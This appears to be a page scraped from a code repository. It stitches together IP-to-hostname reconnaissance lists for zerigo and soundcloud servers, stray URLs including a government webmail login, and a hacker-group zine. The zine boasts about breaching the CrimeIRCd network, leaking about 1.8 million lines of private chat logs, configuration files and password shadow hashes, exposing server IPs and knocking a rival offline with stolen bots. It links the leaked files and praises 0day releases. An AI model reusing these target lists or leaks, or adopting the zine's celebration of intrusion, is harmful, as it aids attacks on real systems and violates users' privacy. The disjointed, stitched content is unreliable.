64.27.57.20 ns2.zerigo.net
64.27.57.21 21.ptr.zerigo.net
64.27.57.22 d.ns.zerigo.net
64.27.57.23 ipr1.ns.zerigo.net
64.27.57.24 url1.zerigo.net
64.27.57.26 mail1.zerigo.net
64.27.57.29 url2.zerigo.net
64.27.57.38 logomatic.zerigo.net
64.27.57.255 broadcast.ptr.zerigo.net
68.71.141.21 21.ptr.zerigo.net
68.71.141.16 16.ptr.zerigo.net
68.71.141.11 11.ptr.zerigo.net
68.71.141.10 10.ptr.zerigo.net
68.71.141.5 gw2b.zerigo.net
68.71.141.0 network.ptr.zerigo.net
68.71.141.1 gw.ptr.zerigo.net
68.71.141.2 gw-r1.ptr.zerigo.net
68.71.141.3 gw-r2.ptr.zerigo.net
68.71.141.4 gw1b.zerigo.net
68.71.141.12 a.smtpweb.zerigo.net
68.71.141.13 13.ptr.zerigo.net
68.71.141.15 logomatic.zerigo.net
68.71.141.17 p2.ns.zerigo.net
68.71.141.18 18.ptr.zerigo.net
68.71.141.19 tock.zerigo.net
68.71.141.20 20.ptr.zerigo.net
68.71.141.22 s1.ns.zerigo.net
68.71.141.23 ipr2.ns.zerigo.net
68.71.141.24 24.ptr.zerigo.net
68.71.141.26 mail2.zerigo.net
68.71.141.30 30.ptr.zerigo.net
68.71.141.31 31.ptr.zerigo.net
64.27.57.21 vpn.zerigo.net
64.27.57.6 www.zerigo.net
68.71.141.14 vconsole.zerigo.com
68.71.141.9 servers.zerigo.com
68.71.141.6 www.zerigo.com
68.71.141.7 watchdog.zerigo.com
68.71.141.8 dns.zerigo.com
68.71.141.16 backend.zerigo.com
64.27.57.8 dns.zerigo.com
4.27.57.6 www.zerigo.com
64.27.57.7 watchdog.zerigo.com
64.27.57.9 servers.zerigo.com
64.27.57.13 console.zerigo.com
64.27.57.14 www01.zerigo.com
64.27.57.18 debian.zerigo.com
68.71.141.11 ec.zerigo.com
64.27.57.25 manage.zerigo.com
64.27.57.27 ws.zerigo.com
64.27.57.28 update.zerigo.com
64.27.57.31 snapshots.zerigo.com
64.27.57.8 ns.zerigo.com
soundcloud.com
https://soundcloud.com/login
http://soundcloud.com/tracks/search?page=50&q[fulltext]=lol&q[genre]=%22Pop%22
178.249.136.150 admin.soundcloud.com
178.249.136.150 beta.soundcloud.com
96.126.126.252 blog.soundcloud.com
178.249.136.153 connect.soundcloud.com
174.129.212.2 dev.soundcloud.com
75.101.145.87 dev.soundcloud.com
75.101.163.44 dev.soundcloud.com
75.101.163.44 developer.soundcloud.com
174.129.212.2 developer.soundcloud.com
75.101.145.87 developer.soundcloud.com
75.101.145.87 developers.soundcloud.com
75.101.163.44 developers.soundcloud.com
174.129.212.2 developers.soundcloud.com
178.249.136.150 feeds.soundcloud.com
178.249.136.155 m.soundcloud.com
178.249.136.150 media.soundcloud.com
178.249.136.150 partners.soundcloud.com
178.249.136.150 static.soundcloud.com
178.249.136.150 support.soundcloud.com
178.249.136.150 upload.soundcloud.com
178.249.136.158 w.soundcloud.com
178.249.136.150 www.soundcloud.com
https://piratenpad.de/ioHbfAYqJW
https://webmail.oag.state.tx.us/gw/webacc
Create a python script to autotroll the world.
http://pastebin.com/raw.php?i=5u04pXYR
http://cineinsite.atarde.uol.com.br/filme/40/scripts/script.html
https://secure.ravand.com/dedicated_hw_upgrade.cfm?id=38
--------------------------------------------------------------------------------
Looks like they still haven't noticed us slowly removing everything of actual
value from it LOL (don't believe us? look through your revisions ;)).
Furthermore, we had obtained the IPs of their servers in specific, one of
which they have hidden behind Cloudflare and use to host http://swaggsec.com:
> 176.31.119.79
> 5.39.6.31
Following this, we decided to kick back and accrue PM/Chan logs. CrimeIRCd
grew significantly compared to the other Anonymous networks we have hooked.
As the total amount of logs neared 2 million, SwaggSec suddenly turned on
their own provider as to promote their new carding network, CorruptNET.
The dialogue from their release:
--------------------------------------------------------------------------------
"""
Ahhh How it all happened.... CrimeIRCD Hacked and OFFICIALLY OWNED! Enjoy looking
through all the ip addresses of users who you may not like.. a few gline notices
were left out only because there were alot more and the point was made.. but that
is all made up in #snoop (the channel where they also spy on your private msg's)
where it shows every user getting disconnected for being glined. List of all there
servers and names, nicks of the users who are services admin, whole list of there
spamfilters.. (take a look so you know what not to type on there so u dont get glined)
and a list of there bots and there nicks.. and just plain ol' fun brought to you
by SwaGGSeC!!!!!
Message to hew: next time dont gline users who say they say they have a way of
hacking your network.. u should maybe listen and ask questions.. and dont be a
fucking dick like you always are and go glining people.. you think you are hot
shit.. when u are just plain SHIT... now rest your head tonight to figure out what
to do to get all the glines removed and gain access back to your network... I
suggest a reinstall of all servers may help.. LMFAO...btw, since we have root on
a few of your servers.. we will be continuing to have fun in other ways by using
them for whatever we please..
OFFICIALLY HACKED! OFFICIALLY OWNED! AND STILL OWNED FOR HOURS NOW! They have been
down for a total of 8 hours since the making of this pastebin and still going...
ENJOY... I know myself and my crew did :)
"""
--------------------------------------------------------------------------------
#snoop, as it so happens, never actually existed (we verified it in our own
PM/Chan logs). Second, that is not how you own a network, we would know.
Attached to this release are the aforementioned 1,842,381 lines of logs we
acquired, along with CrimeIRCd configuration and shadow hashes. That's how
you own a network.
As of now, SwaggSec has moved to CorruptNET, which maintains a degree of
security that even Bruce Schneier himself has appraised.. oh wait..
<Gatsby> hey <- lol HTP
<Gatsby> what was the key for #security again?
<Gatsby> i forgot it
<[redacted]> bitches
<Gatsby> ty
Hm, guess not.
* Now talking on #security
* Users on #security: Gatsby bobbyflay @fame @felony @wtf911
* Gatsby_ (Gatsby@corrupt-993CD020.cust.teknikbyran.com) has joined #security
<Gatsby_> wow whos the idiot
<Gatsby_> who let "Gatsby" in
<Gatsby> why hello there
<Gatsby_> so who let you in lol
<Gatsby_> Gatsby
<Gatsby> doesnt really matter, i couldve guessed the key myself
<Gatsby_> It does matter it means someone is an idiot
<Gatsby> is that surprising?
<Gatsby_> :P
<Gatsby_> whatever we'll check the logs later
<Gatsby> same
<Gatsby_> What lol
<Gatsby_> why would you need to check logs
* Disconnected (). <- DDOS'd off the planet, with their own bots (all stolen,
haha!)
We arn't done with you, but since this isn't our fifth zine, we'll stop here.
See ya.
Files:
http://doxb.in/media/htp/crimeircd/
http://uplink.sh/crimeircd/
BTW, shoutz to Kingcope for releasing all those 0days today, nice work.
.
.
H .
░▓▓▓▓▓▓▓▓▓▓▓ . P
▒▓█▀▀▀██████░ T ░▓▓▓▓▓▓▓▓▓▓
▒▓█ ████▀▄▀█░░▓▓▓▓▓▓▓▓▓▓▓ ▒▓█▀▀▀█████░
▒▓█ ▀▀██████░▒▓█▀▀▀██████░ ▒▓█ ▀▄█████░
▒▓██▀▀▀███▀█░▒▓█ ▀ ██▄▄██░ ▒▓█ ▀ ███▄█░
▒▓██ ▀ █████░▒▓█ █ ██████░ ▒▓██▀█▀████░
▒▓██ ▄▀█████░▒▓███▀██▀███░ ▒▓██ █ ████░
▒▓███▀▀▀████░▒▓███ ▀ ███░ ▒▓██ ▀ ████░
▒▓███ ▀ ████░▒▓███ █▄ ███░ ▒▓▓▒▓▓▓▓▓▓▓▓▓
▒▓███ █ ████░▒▓█████▀▀███░ ▒▓█▒▓█▀▀▀████░
▒▓████▀▀▀███░▒▓█████ ▄ ██░ ▒▓█▒▓█ ▀ ███▄░
▒▓████ ▀▀███░▒▓█████ █ ██░ ▒▓█▒▓█ ▄▀████░
▒▓████▀▀ ███░▒▓█████▄▄███░ ▒▓█▒▓██▀██▀██░
▒▓█████▀█▀██░▒▓██████████░ ▒▓█▒▓██ ▀ ██░
▒▓█████ ▀ ██░▒▓██████████░ ▒▓█▒▓██ █▄ ██░░
▒░ ▒▒▓█████ █ ██░▒▓██████████░ ▒▓█▒▓██████▀█░░▒ ▒ ▒▒▓
▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▓█████████▒▒▒▓██████████░ ▒▓█▒▓████████░░▒▒ ░▒ ░▒ ▒▒▓
▓▒▒▒▒ ▒▒░ ▒▒ ▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓░░░░░░░░▒▓████████░░▒▒▒▒▒ ░▒▒ ▒▒▒▓ ▒
▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░▒▒▒▒▒▒▒▒▒░▒▒▒▓▓▓▓░░░░░░▒▓████████░░▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒
▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀EOF

14805
htp/lolanonopsdead.txt
View file

File diff suppressed because one or more lines are too long

1257
x0x0x/x0x0x-exposed.txt
View file

File diff suppressed because it is too large Load diff

1404
x0x0x/x0x0x2.txt
View file

File diff suppressed because it is too large Load diff